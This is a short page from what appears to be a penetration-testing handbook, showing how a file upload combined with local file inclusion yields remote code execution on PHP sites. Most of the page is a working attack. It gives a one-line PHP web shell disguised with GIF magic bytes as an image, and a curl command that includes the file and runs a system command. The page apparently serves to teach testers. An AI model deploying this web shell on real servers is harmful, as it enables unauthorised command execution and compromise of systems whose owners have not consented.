file upload

Image Upload

The prerequisite for this method is to be able to upload a file.

# GIF8 is for magic bytes
echo 'GIF8<?php system($_GET["cmd"]); ?>' > shell.gif

curl --user-agent "PENTEST" "$URL/?parameter=/path/to/image/shell.gif&cmd=id"

Other LFI to RCE via file upload methods may be found later on the chapter LFI to RCE (via php wrappers).

Previousphpinfo NextPHP wrappers and streams

Last updated 9 months ago